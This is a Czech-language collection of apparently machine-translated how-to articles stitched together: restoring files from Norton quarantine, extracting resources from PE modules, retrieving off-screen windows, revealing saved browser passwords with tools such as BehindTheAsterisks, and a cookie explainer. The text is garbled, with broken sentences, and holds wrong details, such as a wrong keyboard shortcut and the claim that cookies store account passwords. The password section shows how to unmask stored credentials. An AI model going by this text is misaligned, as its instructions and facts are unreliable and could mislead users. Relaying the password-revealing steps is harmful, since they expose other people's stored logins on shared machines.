6. Vyvolejte kontextovou nabídku souboru, který má být opraven, v seznamu na pravé straně okna aplikace a zadáním příkazu „Obnovit“ extrahujte vybraný soubor do jeho původního úložiště určeného v části „Počáteční umístění“.

7. Vyberte položku „Karanténa“ v okně „Protokol zabezpečení“ antivirového programu Norton Internet Security a kliknutím na tlačítko Možnosti proveďte operaci opravy souboru umístěného do karantény.

8. Zadejte požadovaný soubor a vyberte příkaz „Obnovit“. tento soubor“ v okně „Nalezeno nebezpečí“, které se otevře.

9. Klikněte na "Ano" v novém dialogovém okně "Oprava z". karanténa“ a dokončete operaci opravy kliknutím na tlačítko „Zavřít“.

Poznámka!
Odebrání souborů z karantény je povoleno pouze v případě, že jste si naprosto jisti, že jsou neškodné!

Užitečná rada
Je třeba si uvědomit, že „Karanténa“ je speciální složka vytvořená antivirovou aplikací. Soubory v karanténě jsou zcela izolované od operačního systému a nejsou přístupné externím procesům. Nelze je spustit, což zajišťuje bezpečnost jejich uložení.

Operační systém Windows má standardní mechanismus pro vkládání libovolných dat dynamické knihovny a spustitelné moduly, stejně jako API pro práci s nimi. Do modulů PE jsou jako zdroje přidány obrázky, tabulky řetězců, vzorová dialogová okna, panely nástrojů, nabídky a další informace. Občas, pro různé účely, je nutné extrahovat zdroje z kompilovaného modulu.

Budete potřebovat

• – volný program Resource Hacker, dostupný ke stažení na rpi.net.au/~ajohnson/resourcehacker.

Instrukce

1. Nahrajte soubor modulu PE do aplikace Resource Hacker. V hlavní nabídce aplikace klikněte krok za krokem na položky Soubor a Otevřít nebo stiskněte kombinaci kláves Ctrl+O na klávesnici. Zobrazí se dialogové okno pro otevření souboru. Přejděte do adresáře, kde je umístěn cílový soubor. Vyberte PE modul ve výpisu katalogu. Klikněte na tlačítko "Otevřít".

2. Určete seznam zdrojů, které je třeba stáhnout. Po načtení souboru PE se na levé straně hlavního okna Resource Hacker zobrazí stromová struktura. Je to seznam všech zdrojů modulů seskupených podle typu. Řekněme, že zdroje dialogů jsou umístěny v sekci Dialog, zdroje kurzoru - v sekcích Kurzor a Skupina kurzorů, ikony - v sekcích Icon a Icon Group Uzly druhé úrovně hierarchie, obsažené v celé sekci, jsou číselné nebo symbolické identifikátory zdrojů. Rozbalte je a zvýrazněte vnořené prvky. V tomto případě budou vizualizovány odpovídající zdroje. Ikony, kurzory, rastry se zobrazí jako obrázky v pravý panel hlavní okno aplikace. Pro tabulky řetězců, akcelerátory, informace o verzi, vzorová dialogová okna, nabídky, panely nástrojů bude kód vytvořen a zobrazen ve formátu vhodném pro použití s ​​kompilátorem RCC. Vzorová dialogová okna jsou navíc vizualizována v samostatném plovoucím okně.

3. Zahajte proces ukládání zdrojů objevených v předchozím kroku. Vyberte požadovaný prvek ve stromové struktuře vlevo. Otevřete sekci Akce v hlavní nabídce aplikace. Vyberte položku odpovídající operaci uložení zvláště vhodného typu Vyberte položku „Uložit zdroj jako binární soubor…“, pokud chcete zdroj uložit ve formě fragmentu binárních dat identických s tím, které obsahuje PE modul. Chcete-li zakoupit soubor obsahující kompilovanou verzi zvýrazněného zdroje, vyberte možnost „Uložit zdroj jako soubor *. Podobný soubor je vhodný pro propojení s aplikací nebo knihovnou. Klikněte na položku s textem jako „Uložit [název sekce: název podsekce: název zdroje]...“ pro extrahování zdrojů v jejich původní podobě. Tato položka nabídky by měla být použita k extrahování souborů ikon, kurzorů a obrázků.

4. Vytáhněte prameny. V dialogu s názvem „Uložit zdroj do...“ zadejte název a adresář souboru, který chcete uložit. Klikněte na tlačítko "Uložit".

Občas v operačním systému Windows s okno V některých programech se stane zvláštní věc: při minimalizaci a rozbalení na každou obrazovku je jeho chování typické, ale ve středně velkém okně aplikace zmizí mimo viditelnou oblast obrazovky. Existují metody pro načtení okna, které se stáhlo z vaší plochy, a nejsou tak obtížné.

Budete potřebovat

• OS Windows.

Instrukce

1. První způsob, jak vyjmout objekt z viditelné oblasti, je svěřit všechny ruční operace pro jeho umístění samotnému operačnímu systému. Chcete-li to provést, otevřete kromě okna problému ještě jedno okno, které patří jakékoli aplikaci - řekněme spusťte Průzkumníka. Poté klikněte pravým tlačítkem myši na volné místo na hlavním panelu a vyvolejte kontextovou nabídku. Dejte OS příkaz k systematizaci otevřená okna jedna z metod uvedených v nabídce – „Okna v kaskádě“, „Zobrazit okna v zásobníku“ nebo „Zobrazit okna vedle sebe“. Poté se chování ztraceného okna vrátí k normálu.

2. Další metodou je použití ovládání pomocí klávesnice pro umístění okna. Po jeho zapnutí již nebude potřeba najíždět kurzorem myši na nadpis okna, abyste jej mohli přesunout. Chcete-li povolit tento režim, stiskněte kombinaci horkých kláves Alt + mezerník + P. Poté pomocí kláves se šipkami přesuňte skryté okno do viditelné oblasti plochy. Chcete-li deaktivovat režim polohování klávesnice, klepněte kamkoli levým tlačítkem myši.

3. 3. metoda – roztažení dostupného prostoru na ploše. Toho lze dosáhnout zvýšením rozlišení obrazovky. Pokud používáte nejnovější verze Windows 7 nebo Vista OS, klikněte obrázek na pozadí na ploše klikněte pravým tlačítkem a vyberte z vyskakovacího okna kontextová nabídka Položka je ta, která se nazývá „Rozlišení obrazovky“. OS spustí jeden z apletů „Ovládací panely“, kde musíte otevřít rozevírací seznam „Rozlišení“ a posunout posuvník nahoru, nebo ještě lépe, na značku úplně nahoře. Později klikněte na tlačítko „Použít“. Applet změní rozlišení a spustí časovač, po kterém bude tato metamorfóza zrušena. Ve stanoveném čase musíte operaci potvrdit stisknutím tlačítka. Poté vyhledejte chybějící okno, přesuňte jej do středu plochy a vraťte rozlišení obrazovky na předchozí hodnotu.

Mezi informacemi v souborech cookie jsou často požadovány identifikační údaje uživatele. Zjistěte přihlašovací jméno a heslo na internetových zdrojích, které ukládají důvěrná data o svých návštěvnících.

Budete potřebovat

• – PC s operačním systémem Systémy Windows;
• - Přístup na internet;
• – webové prohlížeče: Mozilla Firefox, Opera, Internet Explorer, Google Chrome;
• – program Opera Password Recovery;
• – Nástroj BehindTheAsterisks.

Instrukce

1. Pokud používáte k procházení webu Prohlížeč Mozilla Firefox s aktivovanou funkcí nahrávání souborů cookie v nastavení, zjistěte svá uložená přihlášení a hesla v pohodě se softwarem. Spusťte internetový prohlížeč, otevřete „Nástroje“ a přejděte do nastavení systému. V zobrazeném okně s několika kartami aktivujte možnost „Zabezpečení“.

2. Klikněte na tlačítko "Uloženo". hesla“ v zobrazené sekci a přejděte na nová stránka webový prohlížeč. Má identifikační znaky, které se ukládají do paměti počítače při návštěvě různých internetových zdrojů. Klikněte na řádek „Zobrazit hesla" Ve stejné nabídce prohlížeče můžete chránit své důvěrné informace a nastavit heslo.

3. Zjistěte uživatelská jména, pokud navštívíte zdroje globální síť s pomocí slavného prohlížeče Opera. Otevřete nabídku Nástroje v horní části webového prohlížeče, použijte Správce hesel a zobrazte seznam přihlášení uživatelů.

4. Nainstalujte další software pro přístup k uloženým heslům, přičemž pro tento účel upřednostňujete nástroj Opera Password Recovery. Pamatuj si to program třetí strany nezaručuje úplnou bezpečnost vašich osobních údajů.

5. Dívat se skrz hesla PROTI Prohlížeč Google Chrome, otevřete příslušnou možnost na liště prohlížeče. Přejděte do pokročilých nastavení a aktivujte možnost „Zobrazit soubory cookie“.

6. Využijte výhod multifunkčnosti bezplatný nástroj s podvědomě přístupným rozhraním BehindTheAsterisks a objevujte hesla PROTI kukah standardní prohlížeč Internet Explorer. Přejděte do možností programu a zobrazte kódová slova jako symboly místo hvězdiček a získejte přístup k heslům.

Cookies jsou soubory, které se ukládají na PC uživatele a obsahují informace o stránkách, které kdy navštívil. S podporou cookies můžete zjistit, které stránky uživatel navštívil.

Cookies jsou soubory s informacemi o navštívených stránkách, které jsou uloženy v počítači uživatele. To znamená, že když uživatel navštíví jakýkoli webový zdroj, informace o něm jsou zaznamenány v cookies a při další návštěvě této stránky jsou přeneseny na webový server.

Na co jsou?

Soubory cookie obsahují různé informace, například hesla k účtům na webových stránkách, barvu vzorku, velikost písma, které uživatel pro stránky vytvořil atd. Nejjasnější příklad toho, jak lze soubory cookie použít k uložení nastavení, poskytuje vyhledávač Google. Tento stroj poskytuje možnost přizpůsobit si svůj Výsledky vyhledávání, mluvíme o počtu výsledků na stránce, formátu zobrazovaných stránek, jazyku rozhraní a dalších nastaveních. Pokud jde o hesla k účtům na webových stránkách, každý uživatel si nejednou všiml, že když jednou zadal své přihlašovací jméno a heslo na nějakém webovém zdroji, při opětovné autorizaci to již neudělal, protože tato informace o stránce mechanicky přihlášené k souborům cookie. Při opětovné návštěvě zdroje jsou data odeslána na webový server, který uživatele mechanicky rozpozná a zbaví ho nutnosti vyplňovat pole znovu. Soubory cookie mohou být také užitečné pro udržování statistik. Soubory cookie nemohou pro váš počítač představovat žádné nebezpečí. To jsou jen textová data pro každého, neschopná mu způsobit škodu. S podporou cookies není možné mazat, přenášet nebo číst informace z PC uživatele, je však možné zjistit, které stránky navštívil. Moderní prohlížeče již poskytují uživateli volbu, zda má cookies ukládat či nikoliv, ale pokud preferuje službu ukládání cookies zakázat, měl by být připraven na problémy při práci s některými stránkami.

Nevýhody cookies

Za prvé, ne vždy je pravděpodobné, že soubory cookie správně identifikují uživatele. Za druhé, může je ukrást zločinec. Pokud jde o nesprávné rozpoznání, důvodem může být používání několika prohlížečů uživatelem. Každý prohlížeč má své vlastní úložiště, proto soubory cookie neidentifikují uživatele, ale jeho prohlížeč a počítač, a pokud má několik prohlížečů, bude existovat několik sad souborů cookie. Útočníky může přitahovat nepřetržitá výměna cookies mezi prohlížečem uživatele a webovým serverem, čaj pokud síťový provoz není šifrována, můžete číst soubory cookie uživatele pomocí speciálních sniffer programů. Tento problém lze vyřešit šifrováním provozu a použitím různých protokolů.

Video k tématu